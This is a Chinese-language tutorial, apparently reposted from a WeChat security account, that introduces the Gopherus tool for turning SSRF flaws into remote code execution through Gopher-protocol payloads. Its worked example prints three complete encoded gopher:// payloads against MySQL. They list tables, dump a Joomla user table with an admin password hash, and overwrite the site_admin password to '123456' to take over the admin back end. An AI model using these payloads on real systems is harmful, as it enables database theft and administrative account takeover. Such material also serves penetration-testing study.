文章前言
如果您知道某个地方存在SSRF漏洞,那么这个工具将帮助您生成Gopher载荷以利用SSRF(服务器端请求伪造)和实现RCE(远程代码执行),它还可以帮助您在受害者服务器上获取反向shell
项目地址
https://github.com/tarunkant/Gopherus
项目安装
#下载工具git clone https://github.com/tarunkant/Gopherus
#赋予执行权限chmod +x install.sh#开始进行安装sudo ./install.sh
工具使用
Help
MySQL
Redis
Fast-CGI
Pymemcache
简易案例
结合Gopher协议对本地的MySQL数据库发起攻击测试(之前我们已经有了mysql的连接账户和密码),在此之前我们要用一下Gopherus工具
生成用于攻击MySQL的攻击载荷,这里我们的数据库名称为goblin,我们要执行的命令是使用joomla数据库并查看表名信息
Gopherus --exploit mysql
随后测试载荷:
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%19%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01
随后查看源代码发现joomla_users这个表名
随后我们用同样方法构建payload其中mysql的查询语句为:
use joomla;select * from joomla_users;
访问下面的连接
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01
通过查看源代码以及结合def(用于定义表的列)定义每个列的含义和获取的查询数据可以得到这样一个数据:
-
用户:site_admin
-
密码:$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay
如果我们直接破解这个密文不仅时间长,而且还有可能破不出来,既然通过gopher可以直接操作数据库,那么我们便可以直接覆盖这个site_admin密码,由于mysql支持md5加密,所以我们先生成一个md5的加密密码
echo -n "123456" | md5sum
随后我们直接构建如下payload
use joomla; update joomla_users SET password='e10adc3949ba59abbe56e057f20f883e' WHERE username='site_admin';
随后我们直接访问下面的连接
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%6d%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%75%70%64%61%74%65%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%20%53%45%54%20%70%61%73%73%77%6f%72%64%3d%27%65%31%30%61%64%63%33%39%34%39%62%61%35%39%61%62%62%65%35%36%65%30%35%37%66%32%30%66%38%38%33%65%27%20%57%48%45%52%45%20%75%73%65%72%6e%61%6d%65%3d%27%73%69%74%65%5f%61%64%6d%69%6e%27%3b%01%00%00%00%01
从上面的回显结果可以看到这里成功更新了一条记录,说明我们的密码已经成功更改,随后我们就可以使用site_admin/123456直接登录Joomla后台了
原文始发于微信公众号(七芒星实验室):Gopher协议RCE载荷生成
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论